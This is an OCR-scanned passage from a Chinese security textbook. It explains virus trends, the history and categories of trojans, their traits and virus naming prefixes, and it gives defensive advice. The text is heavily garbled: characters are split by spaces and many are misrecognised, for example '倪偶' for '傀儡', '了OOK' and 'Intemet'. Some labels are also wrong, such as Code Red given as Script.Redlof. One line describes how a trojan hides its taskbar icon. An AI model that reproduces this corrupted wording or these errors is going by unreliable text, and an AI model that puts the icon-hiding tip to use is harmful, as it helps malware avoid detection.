当 运行 焉 时， 选择 “工具 ”一 “Intemet 选项 ”。 在 弹出 的 对 话 框 中 ， 切 换 到 “安全 ” 
选项 卡 。 然 后 单 击 “ 默 认 级 别 ” 按 钮 ， 把 安全 级 别 由 “中 ” 改 为 “高 ”。 

(4) 不 随意 查看 陌生 邮件 ， 尤 其 是 带 有 附件 的 邮件 。 

防止 系统 漏洞 类 蠕虫 病毒 的 侵害 ， 最 好 的 办 法 是 打 好 相应 的 系统 补丁 ， 可 以 应 用 瑞星 
杀毒 软件 的 “漏洞 扫描 ”工具 ， 这 款 工具 可 以 引导 用 户 打 好 补丁 并 进行 相应 的 安全 设置 ， 
彻底 杜绝 病毒 的 感染 。 

防范 邮件 蠕虫 的 最 好 办 法 ， 就 是 提高 自己 的 安全 意识 ， 不 要 轻易 打开 带 有 附件 的 电子 
邮件 。 另 外 ， 启 用 瑞星 杀毒 软件 的 “邮件 发 送 监控 ”和 “邮件 接收 监控 ”功能 ， 也 可 以 提 
高 自己 对 病毒 邮件 的 防护 能 力 。 


4.3.3 ”计算 机 病毒 的 发 展 趋势 


从 目前 病毒 的 演化 趋势 来 看 ， 病 毒 的 发 展 趋势 主要 体现 在 以 下 几 个 方面 。 
1. 主流 病毒 皆 为 综合 利用 多 种 编程 新 技术 产生 


从 Rootkit 技术 到 映 象 劫持 技术 , 从 磁盘 过 滤 驱 动 到 还 原 系统 SSDT HOOK 和 还 原 其 他 
内 核 HOOK 技术 ， 这 些 新 技术 都 成 了 病毒 为 达到 目的 所 采取 的 手段 。 通 过 Rootkit 技术 和 
映 象 劫持 技术 隐藏 自身 的 进程 、 注 册 表 键 值 ， 通 过 插入 进程 、 线 程 避 免 被 杀毒 软件 查 杀 ， 
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通过 实时 监测 对 自身 进程 进行 回 写 ， 避 免 被 杀毒 软件 查 杀 ， 通 过 还 原 系统 SSDT HOOK 和 
还 原 其 他 内 核 了 OOK 技术 破坏 反 病 毒 软件 ,其 中 仅 映 象 劫持 技术 就 包括 “进程 映像 劫持 ”、 
“磁盘 映像 劫持 ”、“ 域 名 映像 劫持 ”、“ 系 统 DLL 动态 链接 库 映 像 劫持 ”等 多 种 方式 。 
未 来 的 计算 机 病毒 将 综合 利用 以 上 新 技术 ， 使 得 杀毒 软件 查 杀 难 度 更 大 。 


2. ARP 病毒 仍 是 局 域 网 的 最 大 祸害 


ARP 病毒 已 经 成 为 近年 来 企业 、 网 吧 、 校 园 网 络 等 局 域 网 的 最 大 威胁 。 此 类 病毒 采用 
ARP 局 域 网 挂 马 攻击 技术 ， 利 用 MAC 地 址 欺骗 ,传播 恶意 广告 或 病毒 程序 ， 使 得 ARP 病 
毒 猩 镍 一 时 。ARP 病毒 发 作 时 ， 通 常会 造成 网 络 掉 线 ， 但 网 络 连 接 正 常 ， 内 网 的 部 分 计算 
机 不 能 上 网 ， 或 者 所 有 计算 机 均 不 能 上 网 ， 无 法 打开 网 页 或 打开 网 页 慢 以 及 局 域 网 连接 时 
断 时 续 并 且 网 速 较 慢 等 现象 。 更 为 严重 的 是 ，ARP 病毒 新 变种 能 够 把 自身 伪装 成 网 关 ， 在 
所 有 用 户 请 求 访问 的 网 页 添加 恶意 代码 ， 导 致 杀毒 软件 在 用 户 访问 任意 网 站 时 均 发 出 病毒 
警报 ， 用 户 下 载 任何 可 执行 文件 ， 均 被 蔡 换 为 病毒 ， 严 重 影响 到 企业 网 络 、 网 吧 、 校 园 网 
络 等 局 域 网 的 正常 运行 。 

虽然 在 各 大 安全 厂商 的 努力 下 ，ARP 病毒 得 到 了 有 效 遏 制 ， 但 由 于 众多 中 小 企业 用 户 
没有 对 此 病毒 的 危害 给 予 足够 重视 ， 没 有 采取 相应 的 防范 措施 ， 因 此 ， 此 类 病毒 在 很 长 一 
段 时 间 内 仍 为 局 域 网 的 主要 祸害 。 


3. 网 游 病毒 把 逐 利 当 作 唯 一 目标 


受 经 济 利益 驱使 ， 利 用 键盘 钩子 、 内 存 截取 或 封包 截取 等 技术 盗 取 网 络 游戏 玩家 的 游 
戏 账 号 、 游 戏 密码 、 所 在 区 服 、 角 色 等 级 、 金 钱 数量 、 仓 库 密码 等 信息 资料 的 病毒 十 分 活 
跃 。 在 最 新 截获 的 新 木马 病毒 中 ，80% 以 上 都 与 盗 取 网 络 游戏 账号 密码 有 关 。 病 毒 作者 盗 
取 互 联网 上 有 价值 的 信息 和 资料 后 转卖 获取 利益 的 目标 十 分 明确 ， 逐 利 已 成 为 此 类 病毒 的 
唯一 动机 和 目标 ， 随 着 网 络 游戏 的 火爆 和 兴盛 ,此 类 病毒 仍然 有 着 庞大 的 市 场 和 生存 空间 ， 
仍 将 成 为 未 来 病毒 的 主流 。 

4. 不 可 避免 地 面 对 驱 动 级 病毒 

目前 ， 大 部 分 主流 病毒 技术 都 进入 了 驱动 级 ， 病 毒 已 经 不 苦 杀 毒 软件 追 杀 ， 而 是 主动 
与 杀毒 软件 争 抢 系 统 驱动 的 控制 权 ， 在 争 抢 系 统 驱 动 控制 权 后 ， 转 而 控制 杀毒 软件 ， 使 杀 
毒 软件 功能 失效 。 病 毒 通 过 生成 驱动 程序 ,与 杀毒 软件 争 抢 系统 控制 权限 ， 通 过 修改 SSDT 
表 等 技术 实现 WINDOWS API HOOK， 从 而 使 得 杀毒 软件 监控 功能 失效 。 

病毒 作者 通过 以 上 几 种 形式 传播 病毒 ， 主 要 目标 还 是 瞄准 经 济 利益 。 一 旦 用 户 计算 机 
染 毒 后 ， 染 毒 计算 机 中 所 有 的 有 价值 的 信息 ， 包 括 网 络 游戏 账号 密码 、 网 上 银行 账号 密码 、 
网 上 证 券 交易 账号 密码 都 面临 着 被 盗 的 危险 ， 因 此 需要 引起 用 户 的 足够 重视 。 

计算 机 病毒 表现 出 的 众多 新 特征 以 及 发 展 趋势 表明 ， 目 前 计算 机 安全 形势 仍然 十 分 严 
峻 ， 反 病毒 业 面 临 着 巨大 的 挑战 ， 需 要 不 断 地 研发 推出 更 加 先进 的 计算 机 反 病 毒 技术 ， 才 
能 应 对 和 超越 计算 机 病毒 的 发 展 ， 为 计算 机 和 网 络 用 户 提供 切实 的 安全 保障 。 
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44 木马 病毒 


4.4.1 木马 概述 


木马 (Trojan) 这 个 名 字 来 源 于 古 希腊 传说 ( 荷 马 史 诗 中 木马 计 的 故事 , Trojan 一 词 的 本 意 
是 特洛伊 ， 即 指 特洛伊 木马 ， 也 就 是 木马 计 的 故事 )。 

“木马 ”程序 是 目前 比较 流行 的 病毒 文件 ， 与 一 般 的 病毒 不 同 ， 它 不 会 自我 繁殖 ， 也 
并 不 “刻意 ”地 去 感染 其 他 文件 ， 它 通过 将 自身 伪装 吸引 用 户 下 载 执 行 ， 向 施 种 木马 者 提 
供 打 开 被 种 者 计算 机 的 门户 ， 使 施 种 者 可 以 任意 毁坏 、 窃 取 被 种 者 的 文件 ， 甚 至 远程 操控 
被 种 者 的 计算 机 。 木 马 的 作用 是 赤裸 裸 地 偷偷 监视 别人 和 盗窃 别人 的 密码 、 数 据 等 。“ 木 
马 ” 与 计算 机 网 络 中 常常 要 用 到 的 远程 控制 软件 有 些 相似 , 但 由 于 远程 控制 软件 是 “善意 ” 
的 控制 ， 因 此 通常 不 具有 隐蔽 性 ; “木马 ” 则 完全 相反 ， 它 要 达到 的 是 “偷窃 ”性 的 远程 
控制 ， 如 果 没 有 很 强 的 隐蔽 性 的 话 ， 那 就 是 “ 毫 无 价值 ”的 。 

木马 通过 一 段 特定 的 程序 (木马 程序 ) 来 控制 男 一 台 计 算 机 。 它 通常 有 两 个 可 执行 程序 : 
一 个 是 客户 端 ， 即 控制 端 ， 另 一 个 是 服务 端 ， 即 被 控制 端 。 植 入 被 种 者 计算 机 的 是 “服务 
器 ”部 分 ， 而 所 谓 的 “黑客 ” 正 是 利用 “控制 器 ”进入 运行 了 “服务 器 ”的 计算 机 。 运 行 
了 木马 程序 的 服务 器 ， 被 种 者 的 计算 机 就 会 有 一 个 或 几 个 端口 被 打开 ， 使 黑客 可 以 利用 这 
些 打 开 的 端口 进入 计算 机 系统 ， 安 全 和 个 人 隐私 也 就 全 无 保障 了 ! 木马 的 设计 者 为 了 防止 
木马 被 发 现 ， 而 采用 多 种 手段 隐藏 木马 。 木 马 程序 一 旦 运行 并 被 控制 端 连接 ， 其 控制 端 将 
享有 服务 端的 大 部 分 操作 权限 ， 例 如 给 计算 机 增加 口令 、 浏 览 、 移 动 、 复 制 、 删 除 文件 、 
修改 注册 表 、 更 改 计算 机 配置 等 。 


4.4.2 ”木马 的 发 展 历史 


计算 机 世界 中 的 特洛伊 木马 病毒 的 名 字 由 《 荷 马 史诗 》 的 特洛伊 战争 得 来 。 故 事 说 的 
是 希腊 人 围攻 特洛伊 城 十 年 后 仍 不 能 得 手 ， 于 是 阿 伽 门 农 受 雅典 娜 的 启发 : 把 士兵 藏匿 于 
巨大 无 比 的 木马 中 ， 然 后 伴 作 退兵 。 当 特洛伊 人 将 木马 作为 战利品 拖 入 城内 时 ， 高 大 的 木 
马 正好 卡 在 城 门 间 ， 进 退 两 难 。 夜 晚 木马 内 的 士兵 候 出 来 ， 与 城 外 的 部 队 里 应 外 合 而 攻 下 
了 特洛伊 城 。 而 计算 机 世界 的 特洛伊 木马 (Trojan) 是 指 隐藏 在 正常 程序 中 的 一 段 具 有 特殊 功 
能 的 恶意 代码 ， 是 具备 破坏 和 删除 文件 、 发 送 密码 、 记 录 键 盘 和 攻击 DOS 等 特殊 功能 的 后 
门 程序 。 

木马 的 发 展 历史 分 为 以 下 几 个 阶段 。 

1) ”伪装 性 病毒 

这 种 病毒 通过 伪装 成 一 个 合法 性 程序 诱骗 用 户 上 当 。 世 界 上 第 一 个 计算 机 木马 是 出 现 
在 1986 年 的 PC-Write 木马 . 它 伪装 成 共享 软件 PC-Write 的 2.72 版 本 (事实 上 , 编写 PC-Write 
的 Quicksoft 公司 从 未 发 行 过 2.72 版 本 )， 一 旦 用 户 信以为真 运行 该 木马 程序 ， 那 么 他 的 下 
场 就 是 硬盘 被 格式 化 。 

2) AIDS 型 木马 

继 PC-Write 之 后 ，1989 年 出 现 了 AIDS 木马 。 由 于 当时 很 少 有 人 使 用 电子 邮件 ， 所 以 
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AIDS 的 作者 就 利用 现实 生活 中 的 邮件 进行 散播 :给 其 他 人 寄 去 一 封 封 含有 木马 程序 软盘 的 
邮件 。 之 所 以 叫 这 个 名 称 是 因为 软盘 中 包含 有 AIDS 和 HIV 疾病 的 药品 、 价 格 、 预 防 措施 
等 相关 信息 。 软 盘 中 的 木马 程序 在 运行 后 ， 虽 然 不 会 破坏 数据 ， 但 是 它 将 硬盘 加 密 锁 死 ， 
然后 提示 受 感染 用 户 花 钱 消 灾 。 

3) 网络 传播 性 木马 

随 着 Internet 的 普及 ， 这 一 代 木 马 兼备 伪装 和 传播 两 种 特征 ， 并 结合 TCP/IP 网 络 技术 
四 处 泛滥 。 同 时 它 还 具有 新 的 特征 。 

(1) 添加 了 “后 门 ”功能 。 

所 谓 后 门 就 是 一 种 可 以 为 计算 机 系统 秘密 开启 访问 入 口 的 程序 。 一 旦 被 安装 ， 这 些 程 
序 就 能 够 使 攻击 者 绕 过 安全 程序 进入 系统 。 该 功能 的 目的 就 是 收集 系统 中 的 重要 信息 ， 例 
如 ; 财务 报告 、 口 令 及 信用 卡号 。 此 外 ， 攻 击 者 还 可 以 利用 后 门 控 制 系统 ， 使 之 成 为 攻击 
其 他 计算 机 的 帮凶 。 由 于 后 门 是 隐藏 在 系统 背后 运行 的 ， 因 此 很 难 被 检测 到 。 它 们 不 像 病 
毒 和 蠕虫 那样 通过 消耗 内 存 而 引起 注意 。 

(2) 添加 了 击 键 记录 功能 。 

从 名 称 上 就 可 以 知道 ， 该 功能 主要 是 记录 用 户 所 有 的 击 键 内 容 ， 然 后 形成 击 键 记录 的 
日 志文 件 发 送 给 恶意 用 户 。 恶意 用 户 可 以 从 中 找到 用 户 名 、 口令 以 及 信用 卡号 等 用 户 信息 。 
这 一 代 木 马 比较 有 名 的 有 国外 的 BO2000(BackOrifice) 和 国内 的 冰河 木马 。 它 们 有 如 下 共同 
特点 : 基于 网 络 的 客户 端 /服务 器 应 用 程序 ， 具有 搜集 信息 、 执 行 系统 命令 、 重 新 设置 机 器 、 
重新 定向 等 功能 。 当 木马 程序 攻击 得 手 后 ， 计 算 机 就 完全 成 了 受 黑 客 控制 的 倪 偶 主机 ， 黑 
客 成 了 超级 用 户 ， 用 户 的 所 有 计算 机 操作 不 但 没有 任何 秘密 而 言 ， 而 且 黑 客 可 以 远程 控制 
倪 偶 主机 对 别 的 主机 发 动 攻击 ， 这 时 候 被 俘获 的 倪 偶 主机 成 了 黑客 进行 进一步 攻击 的 挡 箭 
牌 和 跳板 。 

虽然 木马 程序 手段 越 来 越 隐蔽 ,但 是 苍蝇 不 叮 无 颖 的 蛋 ， 只 要 增强 个 人 安全 防范 意识 ， 
还 是 可 以 大 大 降低 “中 招 ” 的 概率 。 对 此 建议 用 户 : 安装 个 人 防 病毒 软件 、 个 人 防火 墙 软 
件 ; 及 时 安装 系统 补丁 ; 对 不 明 来 历 的 电子 邮件 和 插件 不 予 理 皮 ;经 常 去 安全 网 站 转 一 转 ， 
以 便 及 时 了 解 一 些 新 木马 的 底细 ， 做 到 知己 知 彼 ， 百 战 不 列 。 


4.4.3 ”木马 的 分 类 


1. 网 络 游戏 木马 


随 着 网 络 在 线 游戏 的 普及 和 升温 , 我 国 拥 有 规模 庞大 的 网 游玩 家 。 网 络 游戏 中 的 金钱 、 
装备 等 虚拟 财富 与 现实 财富 之 问 的 界限 越 来 越 模糊 。 与 此 同时 ， 以 盗 取 网 游 账 号 和 密码 为 
目的 的 木马 病毒 也 随 之 发 展 泛滥 起 来 。 

网 络 游戏 木马 通常 采用 记录 用 户 键 盘 输 入 、Hook 游戏 进程 API 函数 等 方法 获取 用 户 的 
密码 和 账号 。 窃 取 到 的 信息 一 般 通 过 发 送 电子 邮件 或 向 远程 脚本 程序 提交 的 方式 发 送 给 木 
马 作者 。 

网 络 游戏 木马 的 种 类 和 数量 ， 在 国产 木马 病毒 中 都 首屈一指 。 流 行 的 网 络 游戏 都 受到 
了 不 同 程度 网 游 木 马 的 威胁 。 一 款 新 游戏 正式 发 布 后 ， 往 往 在 1 一 2 个 星期 内 ， 就 会 有 相应 
的 木马 程序 被 制作 出 来 。 大 量 的 木马 生成 器 和 黑客 网 站 的 公开 销售 也 是 网 游 木马 泛滥 的 原 
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因 之 一 。 
2. 网 银 木 马 


网 银 木 马 是 针对 网 上 交易 系统 编写 的 木马 病毒 ， 其 目的 是 盗 取 用 户 的 卡号 、 密 码 ， 甚 
至 安全 证 书 。 此 类 木马 种 类 数量 虽然 比 不 上 网 游 木马 ， 但 它 的 危害 更 加 直接 ， 受 害 用 户 的 
损失 更 加 惨重 。 

网 银 木 马 通常 针对 性 较 强 , 木马 作者 可 能 首先 对 某 银行 的 网 上 交易 系统 进行 仔细 分 析 ， 
然后 针对 安全 薄弱 环节 编写 病毒 程序 。 如 2004 年 的 “网 银 大 盗 ” 病 毒 ， 在 用 户 进入 工行 网 
银 登录 页 面 时 ， 会 自动 把 页 面 换 成 安全 性 能 较 差 ， 但 依然 能 够 运转 的 老 版 页 面 ， 然 后 记录 
用 户 在 此 页 面 上 填写 的 卡号 和 密码 ; “网 银 大 盗 3” 利 用 招行 网 银 专 业 版 的 备份 安全 证 书 
功能 ， 可 以 盗 取 安全 证 书 : 2005 年 的 “新 网 银 大 盗 ”， 采 用 API Hook 等 技术 干扰 网 银 登 
录 安 全 控件 的 运行 。 随 着 我 国 网 上 交易 的 普及 ， 受 到 外 来 网 银 木马 威胁 的 用 户 也 在 不 断 
增加 。 


3. 即时 通信 软件 木马 


现在 ， 国 内 即时 通信 软件 百花 齐 放 。QQ、 新 浪 UC、 网 易 泡 泡 、 盛 大 圈 圈 等 ， 网 上 聊 
天 的 用 户 群 十 分 庞大 。 常 见 的 即时 通讯 类 木马 一 般 有 三 种 。 

(1) 发 送 消息 型 。 通 过 即时 通信 软件 自动 发 送 含 有 恶意 网 址 的 消息 ， 目 的 在 于 让 收 到 
消息 的 用 户 点 击 网 址 中 毒 。 此 类 病毒 常用 技术 是 搜索 聊天 窗口 ， 进 而 控制 该 窗口 自动 发 送 
文本 内 容 。 发 送 消息 型 木马 常常 充当 网 游 木马 的 广告 ， 如 “武汉 男生 2005” 木 马 ， 可 以 通 
过 MSN、QQ、UC 等 多 种 聊天 软件 发 送 带 毒 网 址 ， 其 主要 功能 是 盗 取 传奇 游戏 的 账号 和 
密码 。 

(2) 盗号 型 。 主 要 目标 在 于 盗 取 即 时 通信 软件 的 登录 账号 和 密码 。 工 作 原 理 和 网 游 森 
马 类 似 。 病 毒 作者 盗 得 他 人 账号 后 ， 可 能 偷窥 聊天 记录 等 隐私 内 容 ， 或 将 账号 卖 掉 。 

(3) 传播 自身 型 。2005 年 年 初 ，“MSN 性 感 鸡 ”等 通过 MSN 传播 的 蠕虫 泛滥 了 一 阵 
之 后 ，MSN 推出 新 版 本 ， 禁 止 用 户 传送 可 执行 文件 。2005 年 上 半年 ，“QQ 龟 ” 和 “QQ 
爱 虫 ”这 两 个 国产 病毒 通过 QQ 聊天 软件 发 送 自身 进行 传播 ， 感 染 用 户 数量 极 大 。 它 对 聊 
天 窗口 进行 控制 ， 来 达到 发 送 文件 或 消息 的 目的 。 

4. 网 页 点 击 类 木马 

网 页 点 击 类 木马 会 恶意 模拟 用 户 点 击 广告 等 动作 ， 在 短 时 间 内 可 以 产生 数 以 万 计 的 点 
击 量 。 病 毒 作者 的 编写 目的 一 般 是 为 了 赚 取 高 额 的 广告 推广 费用 。 此 类 病毒 的 技术 简单 ， 
一 般 只 是 向 服务 器 发 送 HTTP GET 请 求 。 

5. 下 载 类 木马 


这 种 木马 程序 的 体积 一 般 很 小 , 其 功能 是 从 网 络 上 下 载 其 他 病毒 程序 或 安装 广告 软件 。 
由 于 体积 很 小 ， 下 载 类 木马 更 容易 传播 ， 传 播 速度 也 更 快 。 通 常 功能 强大 、 体 积 也 很 大 的 
后 门类 病毒 ， 如 “ 灰 蚀 子 ”、“ 黑 洞 ”等 ， 传 播 时 都 单独 编写 一 个 小 巧 的 下 载 型 木马 ， 用 
户 中 毒 后 会 把 后 门 主 程序 下 载 到 本 机 运行 。 
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6. 代理 类 木马 


用 户 感染 代理 类 木马 后 ， 会 在 本 机 开启 HITP、SOCKS 等 代理 服务 功能 。 黑 客 把 受 感 
染 计算 机 作为 跳板 ， 以 被 感染 用 户 的 身份 进行 黑客 活动 ， 达 到 隐藏 自己 的 目的 。 

一 般 来 说 一 种 杀毒 软件 程序 ， 它 的 木马 专 杀 程序 能 够 查 杀 某 某 木马 的 话 ， 那 么 它 自 己 
的 普通 杀毒 程序 也 当然 能 够 杀 掉 这 种 木马 ， 因 为 在 木马 泛滥 的 今天 ， 为 木马 单独 设计 一 个 
专门 的 木马 查 杀 工具 ， 是 能 提高 该 杀毒 软件 的 产品 档次 的 ， 对 其 声誉 也 会 大 大 有 益 ， 实 际 
上 一 般 的 普通 杀毒 软件 里 都 包含 了 对 木马 的 查 杀 功能 。 如 果 现在 大 家 说 某 某 杀 毒 软件 没有 
木马 专 杀 的 程序 ， 那 这 家 杀毒 软件 厂商 自己 也 会 觉得 有 点 过 意 不 去 ， 即 使 它 是 普通 杀毒 软 
件 也 必须 要 有 杀 除 木马 的 功能 。 

还 有 一 点 就 是 ， 把 查 杀 木马 程序 单独 剥离 出 来 ， 可 以 提高 查 杀 效率 ， 现 在 很 多 杀毒 软 
件 里 的 木马 专 杀 程序 只 对 木马 进行 查 杀 ， 不 去 检查 普通 病毒 库 里 的 病毒 代码 ， 也 就 是 说 当 
用 户 运 行 木马 专 杀 程 序 的 时 候 ， 程 序 只 调用 木马 代码 库 里 的 数据 ， 而 不 调用 病毒 代码 库 里 
的 数据 ， 大 大 提高 木马 查 杀 速 度 。 我 们 知道 查 杀 普通 病毒 的 速度 是 比较 慢 的 ， 因 为 现在 有 
太 多 的 病毒 。 每 个 文件 要 经 过 几 万 条 木马 代码 的 检验 , 然后 再 加 上 已 知 的 差不多 有 近 10 万 
个 病毒 代码 的 检验 ， 那 速度 岂 不 是 很 慢 了 。 省 去 普通 病毒 代码 检验 ， 是 不 是 就 提高 了 效率 ， 
提高 了 速度 呢 ? 也 就 是 说 现在 很 多 杀毒 软件 自 带 的 木马 专 杀 程 序 只 查 杀 木马 而 一 般 不 去 查 
杀 病 毒 ， 但 是 它 自身 的 普通 病毒 查 杀 程序 既 查 杀 病 毒 又 查 杀 木马 ! 


4.4.4 ”木马 的 特征 


木马 和 病毒 都 是 一 种 人 为 的 程序 , 都 属于 计算 机 病毒 , 为 什么 木马 要 单独 提出 来 说 呢 ? 
大 家 都 知道 以 前 的 计算 机 病毒 的 作用 ， 其 实 完 全 就 是 为 了 搞 破坏 ， 破 坏 计 算 机 里 的 资料 数 
据 ， 除 了 破坏 之 外 其 他 无 非 就 是 有 些 病 毒 制造 者 为 了 达到 某 些 目 的 而 进行 的 威慑 和 敲诈 勒 
索 的 作用 ， 或 为 了 炫 泡 自己 的 技术 。“ 木 马 ” 不 一 样 ， 木 马 的 作用 是 赤裸 裸 地 偷偷 监视 别 
人 和 盗窃 别人 的 密码 、 数 据 等 ， 如 盗窃 管理 员 密 码 - 子 网 密码 搞 破坏 或 者 好 玩 ， 偷 窃 上 网 密 
码 用 于 他 用 ， 偷 窃 游 戏 账 号 、 股 票 账 号 甚至 网 银 账户 等 ， 以 达到 偷窥 别人 隐私 和 得 到 经 济 
利益 的 目的 。 所 以 木马 的 功能 比 早期 的 计算 机 病毒 更 加 强大 ， 更 容易 直接 达到 使 用 者 的 目 
的 ! 导致 许多 别有用心 的 程序 开发 者 大 量 地 编写 这 类 带 有 偷窃 和 监视 别人 计算 机 的 侵入 性 
程序 ， 这 就 是 目前 网 上 木马 泛滥 成 灾 的 原因 。 鉴 于 木马 的 这 些 巨 大 危害 性 和 它 与 早期 病毒 
的 作用 性 质 不 一 样 ， 所 以 木马 虽然 属于 病毒 中 的 一 类 ， 但 是 要 单独 地 从 病毒 类 型 中 剥离 出 
来 ， 独 立地 称 为 “木马 ”程序 。 

木马 的 特征 具体 体现 在 以 下 几 方面 。 

1. 隐蔽 性 

木马 必须 隐藏 在 系统 之 中 ， 它 会 想 尽 一 切 办 法 不 让 用 户 发 现 它 。 很 多 人 对 木马 和 远程 
控制 软件 有 点 分 不 清 ， 因 为 木马 程序 要 通过 木马 程序 驻 留 目标 机 器 后 ， 通 过 远程 控制 功能 
控制 目标 机 器 。 

木马 的 隐蔽 性 主要 体现 在 以 下 两 个 方面 。 

(1) 不 产生 图 标 。 它 虽然 在 用 户 系统 启动 时 会 自动 运行 ， 但 它 不 会 在 任务 栏 中 产生 一 
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个 图 标 。 要 想 在 任务 栏 中 隐藏 图 标 ， 只 需要 在 木马 程序 开发 时 把 Form 的 Visible 属性 设置 
为 False、 把 ShowintaskBar 属性 设置 为 False 即 可 。 

(2) 木马 程序 自动 在 任务 管理 器 中 隐藏 ， 并 以 “系统 服务 ”的 方式 欺骗 操作 系统 。 

2. 自动 运行 性 

木马 是 一 个 当 系 统 启动 时 即 自动 运行 的 程序 , 所 以 它 必 须 潜入 用 户 的 启动 配置 文件 中 ， 
如 win.ini、system.ini、winstartbat 以 及 启动 组 等 文件 之 中 。 

3. 欺骗 性 


木马 程序 要 达到 其 长 期 隐蔽 的 目的 ， 就 必须 借助 系统 中 已 有 的 文件 ， 以 防 被 发 现 ， 它 
经 常 使 用 的 是 常见 的 文件 名 或 扩展 名 ， 如 “dll\win\sysvexplorer” 等 字样 ， 或 者 仿制 一 些 不 
易 被 人 区 别 的 文件 名 ， 如 字母 “1” 与 数字 “1”、 字 母 “o” 与 数字 “0”， 常 修改 基本 文 
件 中 的 这 些 难 以 分 辨 的 字符 ， 有 的 甚至 借用 系统 文件 中 己 有 的 文件 名 ， 只 不 过 它 保 存在 不 
同 路 径 之 中 。 还 有 的 木马 程序 为 了 隐藏 自己 ， 也 常 把 自己 设置 成 一 个 ZIP 文件 式 图 标 ， 当 
用 户 一 不 小 心 打开 它 时 ， 它 就 马上 运行 。 那 些 编制 木马 程序 的 人 还 在 不 断 地 研究 、 发 掘 ， 
总 之 是 越 来 越 隐蔽 、 越 来 越 专业 ， 所 以 有 人 称 木 马 程序 为 “骗子 程序 ”。 

4. 自动 恢复 


现在 很 多 的 木马 程序 中 的 功能 模块 已 不 再 是 由 单一 的 文件 组 成 ， 而 是 具有 多 重 备份 
可 以 相互 恢复 。 

5. 自动 打开 特别 的 端口 

木马 程序 潜入 计算 机 之 中 的 目的 不 但 是 为 了 破坏 用 户 的 系统 ， 更 是 为 了 获取 用 户 的 系 
统 中 有 用 的 信息 ， 这 样 就 必须 当 用 户 上 网 时 能 与 远 端 客户 进行 通信 ， 这 样 木马 程序 就 会 用 
服务 器 /客户 端的 通信 手段 把 信息 告诉 黑客 们 ， 以 便 黑 客 们 控制 用 户 的 机 器 ， 或 实施 进一步 
入 侵 的 企图 。 根 据 TCP/IP 协议 , 每 台 计 算 机 可 以 有 从 0 到 65535 号 门 , 但 常用 的 只 有 少数 
几 个 ， 有 这 么 多 门 可 以 进 ， 黑 客 怎 能 进 不 来 ? 

6. 功能 的 特殊 性 

通常 的 木马 的 功能 都 是 十 分 特殊 的 ， 除 了 普通 的 文件 操作 以 外 ， 还 有 些 木马 具有 搜索 
cache 中 的 口令 、 设 置 口令 、 扫 描 目 标 机 器 的 人 P 地 址 、 进 行 键 盘 记录 、 远 程 注册 表 的 操作 
以 及 锁定 鼠标 等 功能 。 

7. 黑客 组 织 趋 于 公开 化 

黑客 组 织 不 但 拥有 自己 的 网 站 ， 而 且 在 网 上 大 肆 招 兵 买 马 ， 让 人 觉得 黑客 组 织 已 经 合 
法 化 了 。 而 黑客 组 织 也 自称 分 成 正邪 两 派 :正派 为 黑客 ， 邪 派 叫 骇 客 。 政 派 当然 是 一 个 犯 
罪 活动 的 组 织 了 ， 而 正派 则 会 自觉 捍卫 国家 利益 。 


4.5 木马 的 攻击 防护 技术 


在 网 络 信息 系统 中 ， 木 马 由 于 其 隐蔽 性 、 远 程 可 植 入 性 和 可 控制 性 等 特点 ， 已 成 为 黑 
客 攻 击 或 不 法 分 子 入 侵 或 控制 他 人 网 络 或 计算 机 系统 的 重要 工具 。 
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4.5.1 常见 木马 的 应 用 


1. 系统 病毒 


系统 病毒 的 前 级 为 : Win32、PE、W32 等 。 这 些 病毒 一 般 公 有 的 特性 是 可 以 感染 
Windows 操作 系统 的 *.exe 和 *.dll 文件 ， 并 通过 这 些 文件 进行 传播 ， 如 CIH 病毒 。 


2. 蠕虫 病毒 


蠕虫 病毒 的 前 级 是 Worm。 这 种 病毒 的 共有 特性 是 通过 网 络 或 者 系统 漏洞 进行 传播 ， 
大 部 分 的 蠕虫 病毒 都 有 向 外 发 送 带 毒 邮件 、 阻 塞 网 络 的 特性 。 比 如 冲击 波 (阻塞 网 络 )， 小 
邮差 (发 带 毒 邮 件 ) 等 。 


3. 木马 病毒 、 黑 客 病毒 


木马 病毒 的 前 级 是 Trojan， 黑 客 病毒 前 级 名 一 般 为 Hack。 木 马 病毒 的 共有 特性 是 通过 
网 络 或 者 系统 漏洞 进入 用 户 的 系统 并 隐藏 ， 然 后 向 外 界 泄露 用 户 的 信息 ， 而 黑客 病毒 则 有 
一 个 可 视 的 界面 ， 能 对 用 户 的 计算 机 进行 远程 控制 。 木 马 、 黑 客 病毒 往往 是 成 对 出 现 的 ， 
即 木马 病毒 负责 侵入 用 户 的 计算 机 ， 而 黑客 病毒 则 会 通过 该 木马 病毒 来 进行 控制 。 现 在 这 
两 种 类 型 越 来 越 趋 向 于 整合 了 。 一 般 的 木马 如 QQ 消息 尾巴 木马 Trojan.QQ3344, 还 有 大 家 
可 能 遇见 比较 多 的 针对 网 络 游戏 的 木马 病毒 ， 如 Trojan.LMir.PSW.60。 

4. 脚本 病毒 

脚本 病毒 的 前 级 是 Script。 脚本 病毒 的 共有 特性 是 使 用 脚本 语言 编写 , 通过 网 页 进行 传 
播 ， 如 “红色 代码 ”(Script.Redlof)。 脚 本 病毒 还 会 有 如 下 前 级 : VBS、JS( 表 明 是 何 种 脚本 
编写 的 )， 如 “欢乐 时 光 ”(VBS.Happytime)、“ 十 四 日 ”(Js.Fortnight.c.s) 等 。 

5. 宏 病 毒 

其 实 宏 病 毒 是 也 是 脚本 病毒 的 一 种 ， 由 于 它 的 特殊 性 ， 因 此 在 这 里 单独 算 成 一 类 。 宏 
病毒 的 前 缀 是 Macro， 第 二 前 级 是 Word、Word 97、Excel、Excel 97( 也 许 还 有 别 的 ) 其 中 之 
一 。 凡 是 只 感染 Word 97 及 以 前 版 本 Word 文档 的 病毒 采用 Word 97 作为 第 二 前 缀 ， 格 式 
是 Macro.Word 97; 凡是 只 感染 Word 97 以 后 版 本 Word 文档 的 病毒 采用 Word 作为 第 二 前 
级 ， 格 式 是 Macro.Word; 凡是 只 感染 Excel 97 及 以 前 版 本 Excel 文档 的 病毒 采用 Excel 97 
作为 第 二 前 级 ,格式 是 Macro.Excel 97; 凡是 只 感染 Excel 97 以 后 版 本 Excel 文档 的 病毒 采 
用 Excel 作为 第 二 前 级 , 格式 是 Macro.Excel， 以 此 类 推 。 该 类 病毒 的 共有 特性 是 能 感染 
Office 系列 文档 , 然后 通过 Office 通用 模板 进行 传播 , 如 :“ 著 名 的 美丽 莎 ”"(Macro.Melissa)。 

6. 后 门 病毒 


后 门 病毒 的 前 缀 是 Backdoor。 该 类 病毒 的 共有 特性 是 通过 网 络 传播 ， 给 系统 开 后 门 ， 
